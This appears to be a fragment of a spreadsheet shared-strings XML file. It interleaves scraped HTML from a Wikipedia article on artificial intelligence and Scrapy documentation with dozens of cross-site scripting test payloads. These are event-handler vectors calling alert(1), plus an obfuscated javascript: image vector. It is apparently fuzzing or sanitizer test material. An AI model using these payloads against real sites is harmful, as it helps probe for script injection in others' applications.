    <t>&lt;li&gt;&lt;a href="/wiki/Memetic_algorithm" title="Memetic algorithm"&gt;Memetic algorithm &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;hgroup onmouseleave="alert(1)"&gt;test&lt;/hgroup&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;dl ondragover=alert(1) contenteditable&gt;drop here&lt;/dl&gt;</t>
  </si>
  <si>
    <t>&lt;fieldset onpointerenter=alert(1)&gt;XSS&lt;/fieldset&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;font id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/font&gt;</t>
  </si>
  <si>
    <t>&lt;button onmouseover="alert(1)"&gt;test&lt;/button&gt;</t>
  </si>
  <si>
    <t>&lt;style draggable="true" ondrag="alert(1)"&gt;test&lt;/style&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li class="toclevel-1 tocsection-1"&gt;&lt;a href="#History"&gt;&lt;span class="tocnumber"&gt;1 </t>
  </si>
  <si>
    <t>&lt;datalist id=x tabindex=1 onfocus=alert(1)&gt;&lt;/datalist&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">    </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;div class="magnify"&gt;&lt;a href="/wiki/File:%C3%84%C3%A4retuvastuse_n%C3%A4ide.png" class="internal" title="Enlarge"&gt; &lt;/a&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, pp.&amp;#160;375–430, &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;It is possible to use AI to predict or generalize the behavior of customers from their &lt;a href="/wiki/Digital_footprints" class="mw-redirect" title="Digital footprints"&gt;digital footprints &lt;/a&gt; in order to target them with personalized promotions or build customer personas automatically.&lt;sup id="cite_ref-Matz_et_al_2017_340-0" class="reference"&gt;&lt;a href="#cite_note-Matz_et_al_2017-340"&gt;&amp;#91;329&amp;#93; &lt;/a&gt; &lt;/sup&gt; A documented case reports that online gambling companies were using AI to improve customer targeting.&lt;sup id="cite_ref-341" class="reference"&gt;&lt;a href="#cite_note-341"&gt;&amp;#91;330&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation web"&gt;&lt;a rel="nofollow" class="external text" href="http://www.goratings.org/"&gt;"World's Go Player Ratings" &lt;/a&gt;. May 2017. &lt;a rel="nofollow" class="external text" href="https://web.archive.org/web/20170401123616/https://www.goratings.org/"&gt;Archived &lt;/a&gt; from the original on 1 April 2017. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=unknown&amp;amp;rft.btitle=World%27s+Go+Player+Ratings&amp;amp;rft.date=2017-05&amp;amp;rft_id=http%3A%2F%2Fwww.goratings.org%2F&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;hr id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/hr&gt;</t>
  </si>
  <si>
    <t>&lt;button onpointerout=alert(1)&gt;XSS&lt;/button&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation news"&gt;Chan, Szu Ping (15 November 2015). &lt;a rel="nofollow" class="external text" href="https://www.telegraph.co.uk/finance/economics/11994694/Heres-what-will-happen-when-robots-take-over-the-world.html"&gt;"This is what will happen when robots take over the world" &lt;/a&gt;&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;23 April </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFLaw1994" class="citation techreport"&gt;Law, Diane (June 1994). &lt;i&gt;Searle, Subsymbolic Functionalism and Synthetic Intelligence &lt;/i&gt; (Technical report). University of Texas at Austin. p.&amp;#160;AI94-222. &lt;a href="/wiki/CiteSeerX" title="CiteSeerX"&gt;CiteSeerX &lt;/a&gt;&amp;#160;&lt;span class="cs1-lock-free" title="Freely accessible"&gt;&lt;a rel="nofollow" class="external text" href="//citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.38.8384"&gt;10.1.1.38.8384 &lt;/a&gt; </t>
  </si>
  <si>
    <t>Knowledge revolution:</t>
  </si>
  <si>
    <t>&lt;meter onmouseup="alert(1)"&gt;test&lt;/meter&gt;</t>
  </si>
  <si>
    <t>&lt;center onmouseleave="alert(1)"&gt;test&lt;/center&gt;</t>
  </si>
  <si>
    <t>&lt;del onbeforecut="alert(1)" contenteditable&gt;test&lt;/del&gt;</t>
  </si>
  <si>
    <t>&lt;li class="toctree-l1"&gt;&lt;a class="reference internal" href="topics/item-pipeline.html"&gt;Item Pipeline&lt;/a&gt;&lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">          Revision &lt;code&gt;a4dbb775&lt;/code&gt;.</t>
  </si>
  <si>
    <t>&lt;code onpaste="alert(1)" contenteditable&gt;test&lt;/code&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;legend id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/legend&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Racetrack_memory" title="Racetrack memory"&gt;Racetrack memory &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Software_deployment" title="Software deployment"&gt;Software deployment &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;hr ondblclick="alert(1)"&gt;test&lt;/hr&gt;</t>
  </si>
  <si>
    <t>document.scripts.length</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/p&gt;&lt;p&gt;&lt;a href="/wiki/Unsupervised_learning" title="Unsupervised learning"&gt;Unsupervised learning &lt;/a&gt; is the ability to find patterns in a stream of input, without requiring a human to label the inputs first. &lt;a href="/wiki/Supervised_learning" title="Supervised learning"&gt;Supervised learning &lt;/a&gt; includes both &lt;a href="/wiki/Statistical_classification" title="Statistical classification"&gt;classification &lt;/a&gt; and numerical &lt;a href="/wiki/Regression_analysis" title="Regression analysis"&gt;regression &lt;/a&gt;, which requires a human to label the input data first. Classification is used to determine what category something belongs in, and occurs after a program sees a number of examples of things from several categories. Regression is the attempt to produce a function that describes the relationship between inputs and outputs and predicts how the outputs should change as the inputs change.&lt;sup id="cite_ref-Machine_learning_117-1" class="reference"&gt;&lt;a href="#cite_note-Machine_learning-117"&gt;&amp;#91;114&amp;#93; &lt;/a&gt; &lt;/sup&gt; Both classifiers and regression learners can be viewed as "function approximators" trying to learn an unknown (possibly implicit) function; for example, a spam classifier can be viewed as learning a function that maps from the text of an email to one of two categories, "spam" or "not spam". &lt;a href="/wiki/Computational_learning_theory" title="Computational learning theory"&gt;Computational learning theory &lt;/a&gt; can assess learners by &lt;a href="/wiki/Computational_complexity" title="Computational complexity"&gt;computational complexity &lt;/a&gt;, by &lt;a href="/wiki/Sample_complexity" title="Sample complexity"&gt;sample complexity &lt;/a&gt; (how much data is required), or by other notions of &lt;a href="/wiki/Optimization_theory" class="mw-redirect" title="Optimization theory"&gt;optimization &lt;/a&gt;.&lt;sup id="cite_ref-118" class="reference"&gt;&lt;a href="#cite_note-118"&gt;&amp;#91;115&amp;#93; &lt;/a&gt; &lt;/sup&gt; In &lt;a href="/wiki/Reinforcement_learning" title="Reinforcement learning"&gt;reinforcement learning &lt;/a&gt;&lt;sup id="cite_ref-Reinforcement_learning_119-0" class="reference"&gt;&lt;a href="#cite_note-Reinforcement_learning-119"&gt;&amp;#91;116&amp;#93; &lt;/a&gt; &lt;/sup&gt; the agent is rewarded for good responses and punished for bad ones. The agent uses this sequence of rewards and punishments to form a strategy for operating in its problem space.</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;Machine ethics </t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;b style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/b&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;span style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/span&gt;</t>
  </si>
  <si>
    <t>&lt;ol&gt;&lt;li&gt;Is &lt;a href="/wiki/Artificial_general_intelligence" title="Artificial general intelligence"&gt;artificial general intelligence &lt;/a&gt; possible? Can a machine solve any problem that a human being can solve using intelligence? Or are there hard limits to what a machine can accomplish? &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Connectionism" title="Connectionism"&gt;Connectionism &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;samp id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/samp&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFNilsson1998"&gt;Nilsson 1998 &lt;/a&gt;, chpt. 13–16 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;blockquote draggable="true" ondragleave="alert(1)"&gt;test&lt;/blockquote&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-384"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-384"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">          &lt;dd&gt;&lt;a href="/en/1.2/"&gt;1.2&lt;/a&gt;&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;td id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/td&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Distributed_artificial_intelligence" title="Distributed artificial intelligence"&gt;Distributed artificial intelligence &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFNRC1999"&gt;NRC 1999 &lt;/a&gt;, pp.&amp;#160;204–205 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;blink ondragover=alert(1) contenteditable&gt;drop here&lt;/blink&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Satplan-195"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Satplan_195-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;caption onkeypress="alert(1)" contenteditable&gt;test&lt;/caption&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Cyborg" title="Cyborg"&gt;Cyborg &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-309"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-309"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;li class="toctree-l1"&gt;&lt;a class="reference internal" href="topics/settings.html"&gt;Settings&lt;/a&gt;&lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;frame onmouseout="alert(1)"&gt;test&lt;/frame&gt;</t>
  </si>
  <si>
    <t>&lt;blockquote draggable="true" ondragstart="alert(1)"&gt;test&lt;/blockquote&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFNilsson1998"&gt;Nilsson 1998 &lt;/a&gt;, ~18.3.3 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;td onpointerenter=alert(1)&gt;XSS&lt;/td&gt;</t>
  </si>
  <si>
    <t>&lt;body oncopy="alert(1)" contenteditable&gt;test&lt;/body&gt;</t>
  </si>
  <si>
    <t>&lt;textarea id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/textarea&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Glossary_of_botany" class="mw-redirect" title="Glossary of botany"&gt;Botany &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation web"&gt;Chapman, Lizette (7 January 2019). &lt;a rel="nofollow" class="external text" href="https://www.latimes.com/business/la-fi-palantir-sales-ipo-20190107-story.html"&gt;"Palantir once mocked the idea of salespeople. Now it's hiring them" &lt;/a&gt;. &lt;i&gt;latimes.com &lt;/i&gt;&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;28 February </t>
  </si>
  <si>
    <t>&lt;hgroup id=x tabindex=1 onfocus=alert(1)&gt;&lt;/hgroup&gt;</t>
  </si>
  <si>
    <t>&lt;hr onclick="alert(1)"&gt;test&lt;/hr&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	&lt;ul id="footer-icons" class="noprint"&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;param style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/param&gt;</t>
  </si>
  <si>
    <t>&lt;img srcset=1 onerror=alert(1)&gt;</t>
  </si>
  <si>
    <t>&lt;body onmousedown="alert(1)"&gt;test&lt;/body&gt;</t>
  </si>
  <si>
    <t>&lt;noscript onpointerenter=alert(1)&gt;XSS&lt;/noscript&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=unknown&amp;amp;rft.jtitle=Bloomberg.com&amp;amp;rft.atitle=Musk-Backed+Group+Probes+Risks+Behind+Artificial+Intelligence&amp;amp;rft.aulast=Clark&amp;amp;rft.aufirst=Jack&amp;amp;rft_id=https%3A%2F%2Fwww.bloomberg.com%2Fnews%2Farticles%2F2015-07-01%2Fmusk-backed-group-probes-risks-behind-artificial-intelligence&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;hr onload=alert(1)&gt;&lt;/hr&gt;</t>
  </si>
  <si>
    <t>&lt;noembed onpointerover=alert(1)&gt;XSS&lt;/noembed&gt;</t>
  </si>
  <si>
    <t>&lt;li id=x tabindex=1 onfocus=alert(1)&gt;&lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;image oncopy="alert(1)" contenteditable&gt;test&lt;/image&gt;</t>
  </si>
  <si>
    <t>&lt;colgroup onmouseout="alert(1)"&gt;test&lt;/colgroup&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Robot_software" title="Robot software"&gt;Software &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;image onpointerout=alert(1)&gt;XSS&lt;/image&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;noframes ondragover=alert(1) contenteditable&gt;drop here&lt;/noframes&gt;</t>
  </si>
  <si>
    <t>&lt;br onpaste="alert(1)" contenteditable&gt;test&lt;/br&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li class="toclevel-2 tocsection-74"&gt;&lt;a href="#History_of_AI"&gt;&lt;span class="tocnumber"&gt;13.2 </t>
  </si>
  <si>
    <t>&lt;form draggable="true" ondrag="alert(1)"&gt;test&lt;/form&gt;</t>
  </si>
  <si>
    <t>&lt;template id=x tabindex=1 onactivate=alert(1)&gt;&lt;/template&gt;</t>
  </si>
  <si>
    <t>&lt;head draggable="true" ondragleave="alert(1)"&gt;test&lt;/head&gt;</t>
  </si>
  <si>
    <t>&lt;u onbeforecut="alert(1)" contenteditable&gt;test&lt;/u&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;main style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/main&gt;</t>
  </si>
  <si>
    <t>&lt;param draggable="true" ondrag="alert(1)"&gt;test&lt;/param&gt;</t>
  </si>
  <si>
    <t>&lt;tt id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/tt&gt;</t>
  </si>
  <si>
    <t>&lt;ins draggable="true" ondragstart="alert(1)"&gt;test&lt;/ins&gt;</t>
  </si>
  <si>
    <t>&lt;br draggable="true" ondragstart="alert(1)"&gt;test&lt;/br&gt;</t>
  </si>
  <si>
    <t>&lt;li onpointerenter=alert(1)&gt;XSS&lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-123"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-123"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;del onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/del&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h3&gt;&lt;span class="mw-headline" id="Evaluating_progress"&gt;Evaluating progress </t>
  </si>
  <si>
    <t xml:space="preserve">			&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;colgroup onpaste="alert(1)" contenteditable&gt;test&lt;/colgroup&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;input style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/input&gt;</t>
  </si>
  <si>
    <t>&lt;q onkeydown="alert(1)" contenteditable&gt;test&lt;/q&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;sub onload=alert(1)&gt;&lt;/sub&gt;</t>
  </si>
  <si>
    <t>&lt;body onpointerup=alert(1)&gt;XSS&lt;/body&gt;</t>
  </si>
  <si>
    <t>&lt;q id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/q&gt;</t>
  </si>
  <si>
    <t>&lt;dt&gt;&lt;a class="reference internal" href="topics/contracts.html"&gt;&lt;span class="doc"&gt;Spiders Contracts</t>
  </si>
  <si>
    <t>&lt;button id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/button&gt;</t>
  </si>
  <si>
    <t>&lt;li class="toctree-l1"&gt;&lt;a class="reference internal" href="topics/exporters.html"&gt;Item Exporters&lt;/a&gt;&lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;(1300) &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;button draggable="true" ondragenter="alert(1)"&gt;test&lt;/button&gt;</t>
  </si>
  <si>
    <t>&lt;strike id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/strike&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;isindex onpointerenter=alert(1)&gt;XSS&lt;/isindex&gt;</t>
  </si>
  <si>
    <t>&lt;spacer onmouseup="alert(1)"&gt;test&lt;/spacer&gt;</t>
  </si>
  <si>
    <t>&lt;bdi onpaste="alert(1)" contenteditable&gt;test&lt;/bdi&gt;</t>
  </si>
  <si>
    <t>&lt;wbr onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/wbr&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;strong ondragover=alert(1) contenteditable&gt;drop here&lt;/strong&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;a href="/wiki/Nils_Nilsson_(researcher)" class="mw-redirect" title="Nils Nilsson (researcher)"&gt;Nils Nilsson &lt;/a&gt; writes: "Simply put, there is wide disagreement in the field about what AI is all about" (&lt;a href="#CITEREFNilsson1983"&gt;Nilsson 1983 &lt;/a&gt;, p.&amp;#160;10). </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-322"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-322"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;input oncontextmenu="alert(1)"&gt;test&lt;/input&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;video style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/video&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	&lt;div id="siteNotice" class="mw-body-content"&gt;&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;optgroup onbeforecut="alert(1)" contenteditable&gt;test&lt;/optgroup&gt;</t>
  </si>
  <si>
    <t>&lt;content onbeforepaste="alert(1)" contenteditable&gt;test&lt;/content&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=77" title="Edit section: External links"&gt;edit &lt;/a&gt;&lt;span class="mw-editsection-bracket"&gt;] </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;a href="/wiki/Siri" title="Siri"&gt;Siri &lt;/a&gt;&lt;span class="nowrap"&gt;&amp;#160; </t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;header style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/header&gt;</t>
  </si>
  <si>
    <t>&lt;picture onmouseup="alert(1)"&gt;test&lt;/picture&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation web"&gt;&lt;a rel="nofollow" class="external text" href="https://www.sas.com/en_ae/solutions/ai.html"&gt;"Artificial Intelligence Solutions, AI Solutions" &lt;/a&gt;. &lt;i&gt;www.sas.com &lt;/i&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=unknown&amp;amp;rft.jtitle=www.sas.com&amp;amp;rft.atitle=Artificial+Intelligence+Solutions%2C+AI+Solutions&amp;amp;rft_id=https%3A%2F%2Fwww.sas.com%2Fen_ae%2Fsolutions%2Fai.html&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;param ondrop=alert(1) contenteditable&gt;drop here&lt;/param&gt;</t>
  </si>
  <si>
    <t>&lt;s ondblclick="alert(1)"&gt;test&lt;/s&gt;</t>
  </si>
  <si>
    <t>&lt;br oncontextmenu="alert(1)"&gt;test&lt;/br&gt;</t>
  </si>
  <si>
    <t>&lt;area onkeypress="alert(1)" contenteditable&gt;test&lt;/area&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-145"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-145"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;acronym onmouseout="alert(1)"&gt;test&lt;/acronym&gt;</t>
  </si>
  <si>
    <t>&lt;meter id=x tabindex=1 onfocus=alert(1)&gt;&lt;/meter&gt;</t>
  </si>
  <si>
    <t>&lt;menu onkeypress="alert(1)" contenteditable&gt;test&lt;/menu&gt;</t>
  </si>
  <si>
    <t>&lt;basefont draggable="true" ondragstart="alert(1)"&gt;test&lt;/basefont&gt;</t>
  </si>
  <si>
    <t>&lt;html onmouseover="alert(1)"&gt;test&lt;/html&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Remotely_operated_underwater_vehicle" title="Remotely operated underwater vehicle"&gt;remotely-operated &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;li class="toctree-l1"&gt;&lt;a class="reference internal" href="topics/deploy.html"&gt;Deploying Spiders&lt;/a&gt;&lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;command onmouseout="alert(1)"&gt;test&lt;/command&gt;</t>
  </si>
  <si>
    <t>&lt;label oncut="alert(1)" contenteditable&gt;test&lt;/label&gt;</t>
  </si>
  <si>
    <t>&lt;slot ondblclick="alert(1)"&gt;test&lt;/slot&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h3&gt;&lt;span class="mw-headline" id="Government"&gt;Government </t>
  </si>
  <si>
    <t>&lt;IMG SRC="jav&amp;#x0D;ascript:alert('');"&gt;</t>
  </si>
  <si>
    <t>&lt;track draggable="true" ondragleave="alert(1)"&gt;test&lt;/track&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;ins id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/ins&gt;</t>
  </si>
  <si>
    <t>&lt;hgroup onkeypress="alert(1)" contenteditable&gt;test&lt;/hgroup&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Microbotics" title="Microbotics"&gt;Microbotics &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;section onblur=alert(1) tabindex=1 id=x&gt;&lt;/section&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;content style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/content&gt;</t>
  </si>
  <si>
    <t>&lt;br draggable="true" ondrag="alert(1)"&gt;test&lt;/br&gt;</t>
  </si>
  <si>
    <t>&lt;custom tags onpointerover=alert(1)&gt;XSS&lt;/custom tags&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Glossary_of_virology" title="Glossary of virology"&gt;Virology &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;a href="/wiki/Bayesian_learning" class="mw-redirect" title="Bayesian learning"&gt;Bayesian learning &lt;/a&gt; and the &lt;a href="/wiki/Expectation-maximization_algorithm" class="mw-redirect" title="Expectation-maximization algorithm"&gt;expectation-maximization algorithm &lt;/a&gt;:</t>
  </si>
  <si>
    <t>&lt;em onkeyup="alert(1)" contenteditable&gt;test&lt;/em&gt;</t>
  </si>
  <si>
    <t>&lt;s draggable="true" ondragleave="alert(1)"&gt;test&lt;/s&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h3&gt;&lt;span class="mw-headline" id="Sub-symbolic"&gt;Sub-symbolic </t>
  </si>
  <si>
    <t xml:space="preserve">          &lt;a href="#"&gt;Scrapy&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;applet id=x tabindex=1 onactivate=alert(1)&gt;&lt;/applet&gt;</t>
  </si>
  <si>
    <t>&lt;p oncopy="alert(1)" contenteditable&gt;test&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;If a machine can be created that has intelligence, could it also &lt;i&gt;&lt;a href="/wiki/Sentience" title="Sentience"&gt;feel &lt;/a&gt; &lt;/i&gt;? If it can feel, does it have the same rights as a human? This issue, now known as "&lt;a href="/wiki/Robot_rights" class="mw-redirect" title="Robot rights"&gt;robot rights &lt;/a&gt;", is currently being considered by, for example, California's &lt;a href="/wiki/Institute_for_the_Future" title="Institute for the Future"&gt;Institute for the Future &lt;/a&gt;, although many critics believe that the discussion is premature.&lt;sup id="cite_ref-Robot_rights_406-0" class="reference"&gt;&lt;a href="#cite_note-Robot_rights-406"&gt;&amp;#91;394&amp;#93; &lt;/a&gt; &lt;/sup&gt; Some critics of &lt;a href="/wiki/Transhumanism" title="Transhumanism"&gt;transhumanism &lt;/a&gt; argue that any hypothetical robot rights would lie on a spectrum with &lt;a href="/wiki/Animal_rights" title="Animal rights"&gt;animal rights &lt;/a&gt; and human rights. &lt;sup id="cite_ref-Evans_2015_407-0" class="reference"&gt;&lt;a href="#cite_note-Evans_2015-407"&gt;&amp;#91;395&amp;#93; &lt;/a&gt; &lt;/sup&gt; The subject is profoundly discussed in the 2010 documentary film &lt;i&gt;&lt;a href="/wiki/Plug_%26_Pray" title="Plug &amp;amp; Pray"&gt;Plug &amp;amp; Pray &lt;/a&gt; &lt;/i&gt;,&lt;sup id="cite_ref-408" class="reference"&gt;&lt;a href="#cite_note-408"&gt;&amp;#91;396&amp;#93; &lt;/a&gt; &lt;/sup&gt; and many sci fi media such as &lt;a href="/wiki/Star_Trek" title="Star Trek"&gt;Star Trek &lt;/a&gt; Next Generation, with the character of &lt;a href="/wiki/Commander_Data" class="mw-redirect" title="Commander Data"&gt;Commander Data &lt;/a&gt;, who fought being disassembled for research, and wanted to "become human", and the robotic holograms in Voyager.</t>
  </si>
  <si>
